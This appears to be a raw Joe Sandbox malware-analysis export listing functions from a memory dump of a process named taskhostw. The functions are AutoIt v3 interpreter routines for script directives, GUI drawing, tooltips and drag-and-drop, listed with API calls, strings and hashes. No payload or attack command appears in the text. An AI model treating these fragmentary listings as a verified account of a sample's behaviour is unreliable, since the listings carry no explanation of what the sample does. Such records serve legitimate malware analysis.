__wcsnicmp.LIBCMT ref: 001B6A91
__wcsnicmp.LIBCMT ref: 001B6AA9
__wcsnicmp.LIBCMT ref: 001B6AC1
__wcsnicmp.LIBCMT ref: 001B6AD9
__wcsnicmp.LIBCMT ref: 001B6AF1
__wcsnicmp.LIBCMT ref: 001B6B09
__wcsnicmp.LIBCMT ref: 001B6B21
__wcsnicmp.LIBCMT ref: 001B6B35
__wcsnicmp.LIBCMT ref: 001B6B76
__wcsnicmp.LIBCMT ref: 001B6B8A
__wcsnicmp.LIBCMT ref: 001B6B9E
__wcsnicmp.LIBCMT ref: 001B6BB2

Strings

Bad directive syntax error, xrefs: 001EE673
#pragma compile, xrefs: 001B6A8B
Cannot parse #include, xrefs: 001EE749
#ce, xrefs: 001B6BAC
#include-once, xrefs: 001B6AEB
#comments-end, xrefs: 001B6B98
#include, xrefs: 001B6B03
#requireadmin, xrefs: 001B6ABB
#cs, xrefs: 001B6B2F, 001B6B84
Unterminated group of comments, xrefs: 001EE75C
#notrayicon, xrefs: 001B6AA3
#OnAutoItStartRegister, xrefs: 001B6AD3
#comments-start, xrefs: 001B6B1B, 001B6B70

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: bbfe1157d4827eb6581cf14adb9609595696ba132b5c2bffdf4baf861aee948f
Instruction ID: 2c85346c2b4c06db6506c7aa01e40c4ac0a168899c4f3f7151598245b5f7466b
Opcode Fuzzy Hash: bbfe1157d4827eb6581cf14adb9609595696ba132b5c2bffdf4baf861aee948f
Instruction Fuzzy Hash: BF814AB0740601BBCB24AF21CD92FEE73A9AF35704F040025F905AB1D2EBA4DE55C6A5

Function 0023A8FC Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?), ref: 0023A935
SetTextColor.GDI32(?,?), ref: 0023A939
GetSysColorBrush.USER32 ref: 0023A94F
GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?,?), ref: 0023A95A
CreateSolidBrush.GDI32(?), ref: 0023A95F
GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?,?), ref: 0023A977
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0023A985
SelectObject.GDI32(?,00000000), ref: 0023A996
SetBkColor.GDI32(?,00000000), ref: 0023A99F
SelectObject.GDI32(?,?), ref: 0023A9AC
InflateRect.USER32 ref: 0023A9CB
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0023A9E2
GetWindowLongW.USER32(00000000,000000F0), ref: 0023A9F7
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0023AA1F
GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?,?), ref: 0023AA46
InflateRect.USER32 ref: 0023AA64
DrawFocusRect.USER32 ref: 0023AA6F
GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0023A62C), ref: 0023AA7D
SetTextColor.GDI32(?,00000000), ref: 0023AA85
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0023AA99
SelectObject.GDI32(?,0023A62C), ref: 0023AAB0
DeleteObject.GDI32(?), ref: 0023AABB
SelectObject.GDI32(?,?), ref: 0023AAC1
DeleteObject.GDI32(?), ref: 0023AAC6
SetTextColor.GDI32(?,?), ref: 0023AACC
SetBkColor.GDI32(?,?), ref: 0023AAD6

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 5a2e0d18bb6a85f21d42c3440e2e4fa2c2719594b9bf225f95724d340d8453f5
Instruction ID: 027edc57cd297903585cdd9325d3d13f67486c0dc7c6de53ed7cd6b0f763407f
Opcode Fuzzy Hash: 5a2e0d18bb6a85f21d42c3440e2e4fa2c2719594b9bf225f95724d340d8453f5
Instruction Fuzzy Hash: 68514DB1D10208FFDB119FA4ED48EAEBBB9EF08320F114625F955AB2A1D7719940CF90

Function 00238A07 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00238AF3
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00238B04
CharNextW.USER32(0000014E), ref: 00238B33
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00238B74
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00238B8A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00238B9B
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00238BB8
SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00238C0A
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00238C20
SendMessageW.USER32(?,00001002,00000000,?), ref: 00238C51
_memset.LIBCMT ref: 00238C76
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00238CBF
_memset.LIBCMT ref: 00238D1E
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00238D48
SendMessageW.USER32(?,00001074,?,00000001), ref: 00238DA0
SendMessageW.USER32(?,0000133D,?,?), ref: 00238E4D
InvalidateRect.USER32(?,00000000,00000001), ref: 00238E6F
GetMenuItemInfoW.USER32 ref: 00238EB9
SetMenuItemInfoW.USER32 ref: 00238EE6
DrawMenuBar.USER32(?), ref: 00238EF5
SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00238F1D

Strings

0, xrefs: 00238E87

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 728d659d1fb9dc1708a22f908859b67863270a9d8237a3b344ffc9ebe6c1c182
Instruction ID: b4c563dbc3d521852ca80472ec0be014b70bf106f1a9cd01b404e1fbda7afcde
Opcode Fuzzy Hash: 728d659d1fb9dc1708a22f908859b67863270a9d8237a3b344ffc9ebe6c1c182
Instruction Fuzzy Hash: 44E1A1B0911309ABDF209F60DC89EEEBBB9FF15750F108156F9159A290DBB48A91CF60

Function 002348F8 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00234A33
GetDesktopWindow.USER32 ref: 00234A48
GetWindowRect.USER32(00000000), ref: 00234A4F
GetWindowLongW.USER32(?,000000F0), ref: 00234AB1
DestroyWindow.USER32 ref: 00234ADD
CreateWindowExW.USER32 ref: 00234B06
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00234B24
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00234B4A
SendMessageW.USER32(?,00000421,?,?), ref: 00234B5F
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00234B72
IsWindowVisible.USER32(?), ref: 00234B92
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00234BAD
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00234BC1
GetWindowRect.USER32(?,?), ref: 00234BD9
MonitorFromPoint.USER32(?,?,00000002), ref: 00234BFF
GetMonitorInfoW.USER32(00000000,?), ref: 00234C19
CopyRect.USER32(?,?), ref: 00234C30
SendMessageW.USER32(?,00000412,00000000), ref: 00234C9B

Strings

0, xrefs: 002349DE
tooltips_class32, xrefs: 00234AFF
(, xrefs: 00234C0C

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 768cadfa2b7053167f91df5ad4e7b5a50a3a59daf12ffea8104a374d04900915
Instruction ID: ff0408f5a5d0185be86c7127533836313e641633455db24bc43c32aee5665a34
Opcode Fuzzy Hash: 768cadfa2b7053167f91df5ad4e7b5a50a3a59daf12ffea8104a374d04900915
Instruction Fuzzy Hash: A1B1BBB0614301AFDB44EF24D989B6ABBE4FF88300F00895DF5999B2A1DB70EC15CB95

Function 002144DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 002144ED
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00214513
_wcscpy.LIBCMT ref: 00214541
_wcscmp.LIBCMT ref: 0021454C
_wcscat.LIBCMT ref: 00214562
_wcsstr.LIBCMT ref: 0021456D
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00214589
_wcscat.LIBCMT ref: 002145D2
_wcscat.LIBCMT ref: 002145D9
_wcsncpy.LIBCMT ref: 00214604

Strings

\VarFileInfo\Translation, xrefs: 00214581
DefaultLangCodepage, xrefs: 002145EC
04090000, xrefs: 002145BF
StringFileInfo\, xrefs: 0021455C
%u.%u.%u.%u, xrefs: 00214667

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: d6c89f379b50dd3518c0e4b17742f9809b02a91cc18ca7845ca953cd1a2d55ab
Instruction ID: af2fb5271b0d65bccde9809d020613a67359892986efee499735883664fca4e4
Opcode Fuzzy Hash: d6c89f379b50dd3518c0e4b17742f9809b02a91cc18ca7845ca953cd1a2d55ab
Instruction Fuzzy Hash: 674108729102057BDB11BB60DC47FBF77ACDF76310F10001AF804E2292EB759A6196A5

Function 001B27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001B28BC
GetSystemMetrics.USER32(00000007), ref: 001B28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001B28EF
GetSystemMetrics.USER32(00000008), ref: 001B28F7
GetSystemMetrics.USER32(00000004), ref: 001B291C
SetRect.USER32 ref: 001B2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001B2949
CreateWindowExW.USER32 ref: 001B297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001B2990
GetClientRect.USER32(00000000,000000FF), ref: 001B29AE
GetStockObject.GDI32(00000011), ref: 001B29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 001B29D5

Part of subcall function 001B2344: GetCursorPos.USER32(?), ref: 001B2357
Part of subcall function 001B2344: ScreenToClient.USER32(002757B0,?), ref: 001B2374
Part of subcall function 001B2344: GetAsyncKeyState.USER32 ref: 001B2399
Part of subcall function 001B2344: GetAsyncKeyState.USER32 ref: 001B23A7

SetTimer.USER32(00000000,00000000,00000028,001B1256), ref: 001B29FC

Strings

AutoIt v3 GUI, xrefs: 001B2974

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c62209bdb5d402b8c411570993fb5c160fe2cec72178d7c035382aca2291c339
Instruction ID: af42f6d7eab84aad9b1b4c09142f150f48850d149406048ef55c56528883b986
Opcode Fuzzy Hash: c62209bdb5d402b8c411570993fb5c160fe2cec72178d7c035382aca2291c339
Instruction Fuzzy Hash: B4B15071A0061AEFDB14DFA8ED49BEDBBB4FB08711F104129FA19972A0DB74D851CB50

Function 0020A844 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0020A885
__swprintf.LIBCMT ref: 0020A926
_wcscmp.LIBCMT ref: 0020A939
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0020A98E
_wcscmp.LIBCMT ref: 0020A9CA
GetClassNameW.USER32(?,?,00000400), ref: 0020AA01
GetDlgCtrlID.USER32 ref: 0020AA53
GetWindowRect.USER32(?,?), ref: 0020AA89
GetParent.USER32(?), ref: 0020AAA7
ScreenToClient.USER32(00000000), ref: 0020AAAE
GetClassNameW.USER32(?,?,00000100), ref: 0020AB28
_wcscmp.LIBCMT ref: 0020AB3C
GetWindowTextW.USER32(?,?,00000400), ref: 0020AB62
_wcscmp.LIBCMT ref: 0020AB76

Part of subcall function 001D37AC: _iswctype.LIBCMT ref: 001D37B4

Strings

%s%u, xrefs: 0020A920

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 6b51d88ea7916299600bdb03f968a3b81dc13df58d1b6e5c563de92e1ab708e4
Instruction ID: 642a6ca5b9b3fa98c037bf41464956843250cf55ca3f6d354b11b79d31a1bd5c
Opcode Fuzzy Hash: 6b51d88ea7916299600bdb03f968a3b81dc13df58d1b6e5c563de92e1ab708e4
Instruction Fuzzy Hash: 94A1D271624707AFD714DF20C884FAAB7E9FF54314F404629F9A9821D2DB30E965CB92

Function 0023C668 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 001B2612: GetWindowLongW.USER32(?,000000EB), ref: 001B2623

DragQueryPoint.SHELL32(?,?), ref: 0023C691

Part of subcall function 0023AB69: ClientToScreen.USER32(?,?), ref: 0023AB92
Part of subcall function 0023AB69: GetWindowRect.USER32(?,?), ref: 0023AC08
Part of subcall function 0023AB69: PtInRect.USER32(?,?,0023C07E), ref: 0023AC18

SendMessageW.USER32(?,000000B0,?,?), ref: 0023C6FA
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0023C705
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0023C728
_wcscat.LIBCMT ref: 0023C758
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0023C76F
SendMessageW.USER32(?,000000B0,?,?), ref: 0023C788
SendMessageW.USER32(?,000000B1,?,?), ref: 0023C79F
SendMessageW.USER32(?,000000B1,?,?), ref: 0023C7C1
DragFinish.SHELL32(?), ref: 0023C7C8
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0023C8BB

Strings

pb', xrefs: 0023C805
@GUI_DRAGFILE, xrefs: 0023C86A
@GUI_DRAGID, xrefs: 0023C833
@GUI_DROPID, xrefs: 0023C7E8

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb'
API String ID: 169749273-1008854898
Opcode ID: d68adb1e18c84c92166eb1281b3f6d8bd2dc567b7ded837608f444a84b73fdbc
Instruction ID: 0f8d15ce8681acc69c9579d175a34013d953eb5a4dc057aa2b835be40db3dd0e
Opcode Fuzzy Hash: d68adb1e18c84c92166eb1281b3f6d8bd2dc567b7ded837608f444a84b73fdbc
Instruction Fuzzy Hash: 5D618C71518300AFC701EF60EC89D9BBBF8EF99710F10092EF6A5931A1DB709A59CB52

Function 0020C2C0 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 0020C2D3
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0020C2E5
SetWindowTextW.USER32(?,?), ref: 0020C2FC
GetDlgItem.USER32(?,000003EA), ref: 0020C311
SetWindowTextW.USER32(00000000,?), ref: 0020C317
GetDlgItem.USER32(?,000003E9), ref: 0020C327
SetWindowTextW.USER32(00000000,?), ref: 0020C32D
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0020C34E
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0020C368
GetWindowRect.USER32(?,?), ref: 0020C371
SetWindowTextW.USER32(?,?), ref: 0020C3DC
GetDesktopWindow.USER32 ref: 0020C3E2
GetWindowRect.USER32(00000000), ref: 0020C3E9
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0020C435
GetClientRect.USER32(?,?), ref: 0020C442
PostMessageW.USER32 ref: 0020C467
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0020C492

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 2105a42037bc1d8e33c44c7bfc56a0179233420fa66ea074cd508d131e091dde
Instruction ID: 4226ca90801c2b774d4de3b92af99057351d251fa714319961df7becbc6d1a2a
Opcode Fuzzy Hash: 2105a42037bc1d8e33c44c7bfc56a0179233420fa66ea074cd508d131e091dde
Instruction Fuzzy Hash: BC51707090070AEFDB20DFA8EE8AB6EBBF5FF04704F104628E556A25A1C774A955CF50

Function 0023A1EB Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0023A28B
DestroyWindow.USER32 ref: 0023A305

Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66

CreateWindowExW.USER32 ref: 0023A37F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0023A3A1
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0023A3B4
DestroyWindow.USER32 ref: 0023A3D6
CreateWindowExW.USER32 ref: 0023A40D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0023A426
GetDesktopWindow.USER32 ref: 0023A43F
GetWindowRect.USER32(00000000), ref: 0023A446
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0023A45E
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0023A476

Part of subcall function 001B25DB: GetWindowLongW.USER32(?,000000EB), ref: 001B25EC

Strings

tooltips_class32, xrefs: 0023A378, 0023A406
0, xrefs: 0023A2A1

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 7b502d1f0287b06def05a2a5c88b62589c839aba0e2f8aca677b0c146366142a
Instruction ID: b10d18563693ebe0c05101f4c1a5e5dea67b7466e5ff297af6b3fcd5bc39cfea
Opcode Fuzzy Hash: 7b502d1f0287b06def05a2a5c88b62589c839aba0e2f8aca677b0c146366142a
Instruction Fuzzy Hash: A87159B1560245AFD724CF28EC49FA677E9EB88700F04462DF995872A0D7B1A952CF12

Function 002343FB Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0023448D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002344D8

Strings

ISCHECKED, xrefs: 0023465B
CHECK, xrefs: 002344F8
GETTOTALCOUNT, xrefs: 002344BF
EXISTS, xrefs: 00234541
GETITEMCOUNT, xrefs: 002345BA
SELECT, xrefs: 00234689
GETSELECTED, xrefs: 002345E8
GETTEXT, xrefs: 0023462B
EXPAND, xrefs: 0023458A
COLLAPSE, xrefs: 0023451E
UNCHECK, xrefs: 002346B4

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 6f5a2eed91d55d06eb7ee1410c925d36291cba22c5ebcb665cc95eb5ce060ab3
Instruction ID: 027ba911ad8dc0acd59d53adf28b35559a35d35004fcc15c09be32237b8dee5b
Opcode Fuzzy Hash: 6f5a2eed91d55d06eb7ee1410c925d36291cba22c5ebcb665cc95eb5ce060ab3
Instruction Fuzzy Hash: 549192702247019FCB14FF20C891A69B7A5AFA5314F4444ADF8965B7A3CB31FD6ACB81

Function 0021A3DC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C

CharLowerBuffW.USER32(?,?), ref: 0021A455
GetDriveTypeW.KERNEL32 ref: 0021A4A2
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0021A4EA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0021A521
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0021A54F

Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66

Strings

set cd door , xrefs: 0021A4F0
closed, xrefs: 0021A469, 0021A472
type cdaudio alias cd wait, xrefs: 0021A4CD
close, xrefs: 0021A45B
open , xrefs: 0021A4B1
open, xrefs: 0021A47C
close cd wait, xrefs: 0021A53A
wait, xrefs: 0021A50C

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

